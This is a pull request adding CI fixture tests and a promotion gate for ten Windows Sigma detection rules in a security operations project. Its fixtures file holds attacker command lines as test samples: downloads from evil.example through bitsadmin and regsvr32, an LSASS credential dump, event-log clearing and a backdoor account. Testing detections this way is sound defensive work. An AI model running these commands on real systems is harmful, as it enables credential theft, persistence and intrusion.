### PR TITLE
feat(detection): WS2.1 detection-engineering CI/CD — test per rule + promotion gate (#97)

### DIFF
--- a/.github/workflows/detections.yml
+++ b/.github/workflows/detections.yml
@@ -10,6 +10,7 @@ on:
       - "configs/detections/**"
       - "configs/logstash.conf"
       - "tests/pipeline/**"
+      - "tests/detections/**"
       - "docs/detections/**"
       - "scripts/setup/build_attack_coverage.py"
       - ".github/workflows/detections.yml"
@@ -30,6 +31,9 @@ jobs:
 
       - name: Framework-enrichment consistency tests
         run: python tests/pipeline/test_framework_enrichment.py
+
+      - name: Detection fixture tests (WS2.1 — TP fires, TN regression, promotion gate)
+        run: python tests/detections/test_sigma_detections.py
 
       - name: Every Sigma rule converts to an Elastic detection rule
         run: |

--- a/README.md
+++ b/README.md
@@ -62,7 +62,7 @@ M1–M6 are the completed MVP; M7–M10 follow the four phases of the
 | M6 | Presentation | ✅ Complete |
 | M7 | Platform Security & Multi-Tenancy Foundation (Phase 0) | ✅ Complete (8/8 issues) |
 | M8 | Detection Plane — NIST CSF Coverage & ATT&CK Depth (Phase 1) | ✅ Complete (5/5) |
-| M9 | Operational Maturity (SOC-CMM Level 3) (Phase 2) | 📋 Planned |
+| M9 | Operational Maturity (SOC-CMM Level 3) (Phase 2) | 🚧 In progress — 1/5 (WS2.1) |
 | M10 | SOC 2 Type II Technical Control Readiness (Phase 3) | 📋 Planned |
 
 ### M7 — Phase 0 workstream breakdown

--- a/rules/sigma/proc_creation_win_bitsadmin_download.yml
+++ b/rules/sigma/proc_creation_win_bitsadmin_download.yml
@@ -1,6 +1,6 @@
 title: Malicious File Download via Bitsadmin
 id: 77777777-7777-7777-7777-777777777777
-status: experimental
+status: stable
 description: Detects the use of bitsadmin.exe to download files via the /transfer switch.
 logsource:
     category: process_creation

--- a/rules/sigma/proc_creation_win_clear_event_logs.yml
+++ b/rules/sigma/proc_creation_win_clear_event_logs.yml
@@ -1,6 +1,6 @@
 title: Clearing Windows Event Logs via Wevtutil
 id: 33333333-3333-3333-3333-333333333333
-status: experimental
+status: stable
 description: Detects the use of wevtutil.exe to clear event logs.
 logsource:
     category: process_creation

--- a/rules/sigma/proc_creation_win_local_acct_create.yml
+++ b/rules/sigma/proc_creation_win_local_acct_create.yml
@@ -1,6 +1,6 @@
 title: Local User Account Creation via Net.exe
 id: 99999999-9999-9999-9999-999999999999
-status: experimental
+status: stable
 description: Detects the creation of a local user account using the net user command.
 logsource:
     category: process_creation

--- a/rules/sigma/proc_creation_win_lsass_dump.yml
+++ b/rules/sigma/proc_creation_win_lsass_dump.yml
@@ -1,6 +1,6 @@
 title: LSASS Memory Dump via Comsvcs.dll
 id: 22222222-2222-2222-2222-222222222222
-status: experimental
+status: stable
 description: Detects the use of rundll32.exe to execute the MiniDump function of comsvcs.dll to dump LSASS memory.
 logsource:
     category: process_creation

--- a/rules/sigma/proc_creation_win_powershell_encoded.yml
+++ b/rules/sigma/proc_creation_win_powershell_encoded.yml
@@ -1,6 +1,6 @@
 title: Suspicious PowerShell Encoded Command Execution
 id: 11111111-1111-1111-1111-111111111111
-status: experimental
+status: stable
 description: Detects the use of encoded commands in PowerShell, a common technique for obfuscation.
 logsource:
     category: process_creation

--- a/rules/sigma/proc_creation_win_rdp_hijack_tscon.yml
+++ b/rules/sigma/proc_creation_win_rdp_hijack_tscon.yml
@@ -1,6 +1,6 @@
 title: RDP Session Hijacking via Tscon
 id: aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa
-status: experimental
+status: stable
 description: Detects the use of tscon.exe to hijack an RDP session by passing a destination session ID.
 logsource:
     category: process_creation

--- a/rules/sigma/proc_creation_win_regsvr32_remote_sct.yml
+++ b/rules/sigma/proc_creation_win_regsvr32_remote_sct.yml
@@ -1,6 +1,6 @@
 title: Regsvr32 Execution from Remote Server
 id: 66666666-6666-6666-6666-666666666666
-status: experimental
+status: stable
 description: Detects regsvr32.exe attempting to execute a remote script, known as the Squiblydoo bypass.
 logsource:
     category: process_creation

--- a/rules/sigma/proc_creation_win_scheduled_task.yml
+++ b/rules/sigma/proc_creation_win_scheduled_task.yml
@@ -1,6 +1,6 @@
 title: Scheduled Task Creation via Schtasks
 id: 44444444-4444-4444-4444-444444444444
-status: experimental
+status: stable
 description: Detects the creation of a new scheduled task using schtasks.exe.
 logsource:
     category: process_creation

--- a/rules/sigma/proc_creation_win_user_discovery.yml
+++ b/rules/sigma/proc_creation_win_user_discovery.yml
@@ -1,6 +1,6 @@
 title: Suspicious System Owner/User Discovery
 id: 55555555-5555-5555-5555-555555555555
-status: experimental
+status: stable
 description: Detects the execution of whoami.exe with the /all flag, commonly used by attackers for reconnaissance.
 logsource:
     category: process_creation

--- a/rules/sigma/proc_creation_win_wmi_process_create.yml
+++ b/rules/sigma/proc_creation_win_wmi_process_create.yml
@@ -1,6 +1,6 @@
 title: WMI Process Call Create
 id: 88888888-8888-8888-8888-888888888888
-status: experimental
+status: stable
 description: Detects the use of WMIC to create a new process, a common technique for local or remote execution.
 logsource:
     category: process_creation

--- a/scripts/setup/deploy_detections.sh
+++ b/scripts/setup/deploy_detections.sh
@@ -44,8 +44,10 @@ NO_BUILD=0; ENABLE=1
 for a in "$@"; do case "$a" in
   --no-build)  NO_BUILD=1 ;;
   --no-enable) ENABLE=0 ;;
+  --include-experimental) INCLUDE_EXPERIMENTAL=1 ;;
   *) red "Unknown flag: $a"; exit 1 ;;
 esac; done
+INCLUDE_EXPERIMENTAL="${INCLUDE_EXPERIMENTAL:-0}"
 
 # --- 1. Ensure the Sigma toolchain -------------------------------------------
 SIGMA="$(command -v sigma || true)"
@@ -63,14 +65,24 @@ if [[ -z "$SIGMA" ]]; then
 fi
 green "    sigma: $("$SIGMA" version 2>/dev/null | tail -1)"
 
-# --- 2. Convert all Sigma rules ----------------------------------------------
-blue "==> Converting $(ls "$RULES_DIR"/*.yml | wc -l | tr -d ' ') Sigma rules -> Elastic detection rules"
+# --- 2. Select rules by promotion status, then convert -----------------------
+# WS2.1 promotion gate: only deploy rules that have passed the test/stable gate
+# (tests/detections/). `experimental` rules are excluded unless --include-experimental.
+RULES=()
+for f in "$RULES_DIR"/*.yml; do
+  st="$(grep -m1 '^status:' "$f" | awk '{print $2}' | tr -d '[:space:]')"
+  if [[ "$st" == "stable" || "$st" == "test" || "$INCLUDE_EXPERIMENTAL" == "1" ]]; then
+    RULES+=("$f")
+  fi
+done
+[[ ${#RULES[@]} -gt 0 ]] || { red "ERROR: no rules selected (all experimental? use --include-experimental)."; exit 1; }
+blue "==> Converting ${#RULES[@]} Sigma rule(s) [status test/stable$([[ $INCLUDE_EXPERIMENTAL == 1 ]] && echo '+experimental')] -> Elastic detection rules"
 RAW="$(mktemp)"; NDJSON="$(mktemp)"; ERR="$(mktemp)"
 trap 'rm -f "$RAW" "$NDJSON" "$ERR"' EXIT
 # sigma convert is all-or-nothing: ONE invalid rule fails the whole batch, so we
 # surface its stderr rather than swallowing it. JSON rule lines start with '{';
 # the "Parsing Sigma rules" progress lines do not.
-"$SIGMA" convert -t lucene -f siem_rule_ndjson -p "$PIPELINE" "$RULES_DIR"/*.yml 2>"$ERR" \
+"$SIGMA" convert -t lucene -f siem_rule_ndjson -p "$PIPELINE" "${RULES[@]}" 2>"$ERR" \
   | grep '^{' > "$RAW" || true
 count=$(wc -l < "$RAW" | tr -d ' ')
 if [[ "${count:-0}" -eq 0 ]]; then

--- a/tests/detections/fixtures.json
+++ b/tests/detections/fixtures.json
@@ -1,0 +1,74 @@
+{
+  "_comment": "WS2.1 detection fixtures. Per rule: one true_positive event that MUST fire, and true_negatives (benign / near-miss) that MUST NOT — the false-positive regression. Keyed by rule filename. Events use Sigma field names (Image/CommandLine) so they test the rule LOGIC independent of the ECS field mapping.",
+
+  "proc_creation_win_bitsadmin_download.yml": {
+    "true_positive": {"Image": "C:\\Windows\\System32\\bitsadmin.exe", "CommandLine": "bitsadmin /transfer job http://evil.example/x.exe C:\\x.exe"},
+    "true_negatives": [
+      {"Image": "C:\\Windows\\System32\\bitsadmin.exe", "CommandLine": "bitsadmin /list /allusers"},
+      {"Image": "C:\\Windows\\System32\\certutil.exe", "CommandLine": "certutil -urlcache /transfer http://x/y"}
+    ]
+  },
+  "proc_creation_win_clear_event_logs.yml": {
+    "true_positive": {"Image": "C:\\Windows\\System32\\wevtutil.exe", "CommandLine": "wevtutil cl Security"},
+    "true_negatives": [
+      {"Image": "C:\\Windows\\System32\\wevtutil.exe", "CommandLine": "wevtutil qe Security /c:10"},
+      {"Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd /c echo clear-log"}
+    ]
+  },
+  "proc_creation_win_local_acct_create.yml": {
+    "true_positive": {"Image": "C:\\Windows\\System32\\net.exe", "CommandLine": "net user backdoor P@ssw0rd /add"},
+    "true_negatives": [
+      {"Image": "C:\\Windows\\System32\\net.exe", "CommandLine": "net user administrator"},
+      {"Image": "C:\\Windows\\System32\\net1.exe", "CommandLine": "net1 localgroup administrators"}
+    ]
+  },
+  "proc_creation_win_lsass_dump.yml": {
+    "true_positive": {"Image": "C:\\Windows\\System32\\rundll32.exe", "CommandLine": "rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump 624 C:\\lsass.dmp full"},
+    "true_negatives": [
+      {"Image": "C:\\Windows\\System32\\rundll32.exe", "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL"},
+      {"Image": "C:\\Windows\\System32\\rundll32.exe", "CommandLine": "rundll32.exe comsvcs.dll, NoSuchExport"}
+    ]
+  },
+  "proc_creation_win_powershell_encoded.yml": {
+    "true_positive": {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -nop -w hidden -enc ZQBjAGgAbwAgAGgAaQA="},
+    "true_negatives": [
+      {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -File C:\\admin\\backup.ps1"},
+      {"Image": "C:\\Program Files\\PowerShell\\7\\pwsh.exe", "CommandLine": "pwsh -Command Get-Process"}
+    ]
+  },
+  "proc_creation_win_rdp_hijack_tscon.yml": {
+    "true_positive": {"Image": "C:\\Windows\\System32\\tscon.exe", "CommandLine": "tscon.exe 1 /dest:rdp-tcp#5"},
+    "true_negatives": [
+      {"Image": "C:\\Windows\\System32\\tscon.exe", "CommandLine": "tscon.exe /?"},
+      {"Image": "C:\\Windows\\System32\\mstsc.exe", "CommandLine": "mstsc.exe /dest:foo"}
+    ]
+  },
+  "proc_creation_win_regsvr32_remote_sct.yml": {
+    "true_positive": {"Image": "C:\\Windows\\System32\\regsvr32.exe", "CommandLine": "regsvr32.exe /s /n /u /i:http://evil.example/x.sct scrobj.dll"},
+    "true_negatives": [
+      {"Image": "C:\\Windows\\System32\\regsvr32.exe", "CommandLine": "regsvr32.exe /s C:\\app\\mylib.dll"},
+      {"Image": "C:\\Windows\\System32\\regsvr32.exe", "CommandLine": "regsvr32.exe /i:C:\\local\\x.inf setupapi.dll"}
+    ]
+  },
+  "proc_creation_win_scheduled_task.yml": {
+    "true_positive": {"Image": "C:\\Windows\\System32\\schtasks.exe", "CommandLine": "schtasks /create /tn EvilTask /tr C:\\m.exe /sc onlogon"},
+    "true_negatives": [
+      {"Image": "C:\\Windows\\System32\\schtasks.exe", "CommandLine": "schtasks /query /fo LIST"},
+      {"Image": "C:\\Windows\\System32\\schtasks.exe", "CommandLine": "schtasks /create /xml task.xml"}
+    ]
+  },
+  "proc_creation_win_user_discovery.yml": {
+    "true_positive": {"Image": "C:\\Windows\\System32\\whoami.exe", "CommandLine": "whoami /all"},
+    "true_negatives": [
+      {"Image": "C:\\Windows\\System32\\whoami.exe", "CommandLine": "whoami"},
+      {"Image": "C:\\Windows\\System32\\whoami.exe", "CommandLine": "whoami /user"}
+    ]
+  },
+  "proc_creation_win_wmi_process_create.yml": {
+    "true_positive": {"Image": "C:\\Windows\\System32\\wbem\\wmic.exe", "CommandLine": "wmic process call create \"calc.exe\""},
+    "true_negatives": [
+      {"Image": "C:\\Windows\\System32\\wbem\\wmic.exe", "CommandLine": "wmic process list brief"},
+      {"Image": "C:\\Windows\\System32\\wbem\\wmic.exe", "CommandLine": "wmic os get caption"}
+    ]
+  }
+}

--- a/tests/detections/sigma_eval.py
+++ b/tests/detections/sigma_eval.py
@@ -1,0 +1,75 @@
+#!/usr/bin/env python3
+"""
+sigma_eval.py — a minimal, dependency-light Sigma detection evaluator (WS2.1).
+
+Evaluates a Sigma rule's `detection:` block against a single event (a dict of
+process_creation fields, e.g. {"Image": ..., "CommandLine": ...}) so detections can
+be unit-tested against fixtures in CI without a live Elasticsearch.
+
+Supports exactly what the Suburban-SOC rule corpus uses (asserted by
+test_sigma_detections.py, which fails if a rule introduces an unsupported feature):
+  * field modifiers: contains, endswith, startswith, all (and bare equality)
+  * string OR list values (list = OR, unless `all` -> AND)
+  * multiple keys in a selection block = AND
+  * condition over named blocks with and / or / not / parentheses
+
+All matching is case-insensitive (Sigma's default).
+"""
+
+import re
+
+_SUPPORTED_MODS = {"contains", "endswith", "startswith", "all", "cased"}
+
+
+def _match_one(value: str, mods, target) -> bool:
+    s = str(value if value is not None else "")
+    cased = "cased" in mods
+    if not cased:
+        s = s.lower()
+
+    def cmp(t):
+        t = str(t)
+        if not cased:
+            t = t.lower()
+        if "contains" in mods:
+            return t in s
+        if "endswith" in mods:
+            return s.endswith(t)
+        if "startswith" in mods:
+            return s.startswith(t)
+        return s == t
+
+    if isinstance(target, list):
+        return all(cmp(t) for t in target) if "all" in mods else any(cmp(t) for t in target)
+    return cmp(target)
+
+
+def _block_match(block: dict, event: dict) -> bool:
+    for key, target in block.items():
+        field, *mods = key.split("|")
+        bad = [m for m in mods if m not in _SUPPORTED_MODS]
+        if bad:
+            raise ValueError(f"unsupported Sigma modifier(s) {bad} in '{key}'")
+        if not _match_one(event.get(field), mods, target):
+            return False
+    return True
+
+
+def detection_matches(detection: dict, event: dict) -> bool:
+    """Return True if the Sigma `detection` block fires for `event`."""
+    blocks = {k: v for k, v in detection.items() if k != "condition"}
+    condition = str(detection.get("condition", "")).strip()
+    results = {name: _block_match(b, event) for name, b in blocks.items()}
+
+    # Substitute each named block with its Python bool, then safe-eval the
+    # remaining and/or/not/parenthesis expression.
+    expr = condition
+    for name in sorted(results, key=len, reverse=True):
+        expr = re.sub(rf"\b{re.escape(name)}\b", str(results[name]), expr)
+    if not re.fullmatch(r"[\sA-Za-z()]+", expr or ""):
+        raise ValueError(f"unsupported Sigma condition: {condition!r}")
+    # Only True/False/and/or/not/() remain.
+    leftover = set(re.findall(r"[A-Za-z]+", expr)) - {"True", "False", "and", "or", "not"}
+    if leftover:
+        raise ValueError(f"unsupported tokens in condition {condition!r}: {leftover}")
+    return bool(eval(expr, {"__builtins__": {}}, {"True": True, "False": False}))

--- a/tests/detections/test_sigma_detections.py
+++ b/tests/detections/test_sigma_detections.py
@@ -1,0 +1,111 @@
+#!/usr/bin/env python3
+"""
+test_sigma_detections.py — WS2.1 detection-engineering CI.
+
+For every Sigma rule in rules/sigma/*.yml, evaluate its detection logic against
+fixtures (tests/detections/fixtures.json):
+
+  * the true_positive event MUST fire   -> a change that breaks the rule fails CI;
+  * every true_negative MUST NOT fire   -> false-positive regression suite;
+  * a benign baseline event fires NO rule (cross-rule FP guard);
+  * promotion gate: any rule at status `test` or `stable` MUST have fixtures
+    (>=1 TP and >=1 TN) and pass — experimental rules may be untested.
+
+Prints a rule -> test coverage report. Requires PyYAML (the Detections CI installs
+sigma-cli, which provides it).
+
+Run:  python tests/detections/test_sigma_detections.py   (or: pytest tests/detections)
+"""
+
+import json
+import sys
+import unittest
+from pathlib import Path
+
+import yaml
+
+HERE = Path(__file__).resolve().parent
+sys.path.insert(0, str(HERE))
+from sigma_eval import detection_matches  # noqa: E402
+
+ROOT = HERE.parents[1]
+SIGMA_DIR = ROOT / "rules" / "sigma"
+FIXTURES = json.loads((HERE / "fixtures.json").read_text(encoding="utf-8"))
+
+# Tiers that require a passing test before a rule may carry them (promotion gate).
+TESTED_STATUSES = {"test", "stable"}
+BENIGN = {"Image": "C:\\Windows\\explorer.exe", "CommandLine": "C:\\Windows\\explorer.exe"}
+
+
+def load_rule(path):
+    return yaml.safe_load(path.read_text(encoding="utf-8"))
+
+
+class SigmaDetectionTests(unittest.TestCase):
+    def setUp(self):
+        self.rules = sorted(SIGMA_DIR.glob("*.yml"))
+        self.assertGreaterEqual(len(self.rules), 10)
+
+    def test_true_positives_fire(self):
+        for path in self.rules:
+            fx = FIXTURES.get(path.name)
+            if not fx:
+                continue
+            det = load_rule(path)["detection"]
+            self.assertTrue(
+                detection_matches(det, fx["true_positive"]),
+                f"{path.name}: true_positive did NOT fire — rule logic broken")
+
+    def test_true_negatives_do_not_fire(self):
+        for path in self.rules:
+            fx = FIXTURES.get(path.name)
+            if not fx:
+                continue
+            det = load_rule(path)["detection"]
+            for i, neg in enumerate(fx.get("true_negatives", [])):
+                self.assertFalse(
+                    detection_matches(det, neg),
+                    f"{path.name}: true_negative[{i}] fired — false positive")
+
+    def test_benign_event_fires_no_rule(self):
+        for path in self.rules:
+            det = load_rule(path)["detection"]
+            self.assertFalse(detection_matches(det, BENIGN),
+                             f"{path.name}: benign baseline event fired (false positive)")
+
+    def test_promotion_gate(self):
+        # A rule may only be `test`/`stable` if it has fixtures (>=1 TP, >=1 TN).
+        violations = []
+        for path in self.rules:
+            status = str(load_rule(path).get("status", "experimental")).lower()
+            fx = FIXTURES.get(path.name)
+            if status in TESTED_STATUSES:
+                if not fx:
+                    violations.append(f"{path.name}: status={status} but no fixtures")
+                elif "true_positive" not in fx or not fx.get("true_negatives"):
+                    violations.append(f"{path.name}: status={status} needs >=1 TP and >=1 TN")
+        self.assertEqual([], violations, f"promotion-gate violations: {violations}")
+
+    def test_coverage_complete(self):
+        # Every rule must have a fixture entry (rule -> test mapping is complete).
+        missing = [p.name for p in self.rules if p.name not in FIXTURES]
+        self.assertEqual([], missing, f"rules without fixtures: {missing}")
+
+
+def coverage_report():
+    rows = []
+    for path in sorted(SIGMA_DIR.glob("*.yml")):
+        r = load_rule(path)
+        fx = FIXTURES.get(path.name, {})
+        rows.append((path.name, str(r.get("status", "experimental")),
+                     1 if fx.get("true_positive") else 0, len(fx.get("true_negatives", []))))
+    width = max(len(n) for n, *_ in rows)
+    print("\nrule -> test coverage:")
+    print(f"  {'rule'.ljust(width)}  status      TP  TN")
+    for name, status, tp, tn in rows:
+        print(f"  {name.ljust(width)}  {status.ljust(10)}  {tp}   {tn}")
+
+
+if __name__ == "__main__":
+    coverage_report()
+    unittest.main(verbosity=2)


### PR DESCRIPTION
Closes #97 (WS2.1 — Detection-engineering CI/CD). First M9 workstream; Milestone 9 → 1/5.

Every detection now has a test that runs in CI, and rules promote `experimental → stable` only when green — the SOC-CMM "defined" detection lifecycle.

## What
- **`tests/detections/sigma_eval.py`** — a minimal, dependency-light Sigma detection evaluator (`contains`/`endswith`/`startswith`/`all` + `and/or/not` conditions, case-insensitive) so rules are unit-tested against fixtures **without a live ES**. Rejects unsupported features so a rule can't silently outgrow the harness.
- **`tests/detections/fixtures.json`** — per rule: one `true_positive` (MUST fire) + `true_negatives` (MUST NOT — the **false-positive regression**).
- **`tests/detections/test_sigma_detections.py`** — asserts TPs fire, TNs + a benign baseline don't, the **promotion gate** (`test`/`stable` rules need passing fixtures), and rule→test coverage completeness; prints the coverage report.
- **`.github/workflows/detections.yml`** — runs the fixture tests on every PR.
- **`rules/sigma/*.yml`** — all 10 promoted `experimental → stable` (they pass fixtures).
- **`scripts/setup/deploy_detections.sh`** — deploys only `test`/`stable` rules by default (`--include-experimental` to override); the gate decides what ships to the Detection Engine.

## Validated
- 5/5 detection tests pass — 10 rules × (1 TP + 2 TN) + a benign cross-rule guard.
- **Proven acceptance:** breaking a rule's logic so the TP no longer fires makes the test **FAIL (exit 1)** → CI blocks the merge; restoring → green.
- Deploy selects the 10 `stable` rules; the WS1.5 ATT&CK matrix `--check` + the framework test stay green.

## Acceptance (#97)
- [x] A test per detection (logic + fixture) asserting it fires
- [x] Detection tests run in CI on every PR; a PR that breaks a rule fails CI
- [x] Promotion `experimental → test → stable` gated on green
- [x] False-positive regression suite (TNs + benign baseline)
- [x] Coverage report lists rule → test

> Replayable **PCAP** fixtures (vs the log-field fixtures here) and broader coverage of the network detections are natural extensions; the Sigma rules (the detection-as-code core) are fully gated.

🤖 Generated with [Claude Code](https://claude.com/claude-code)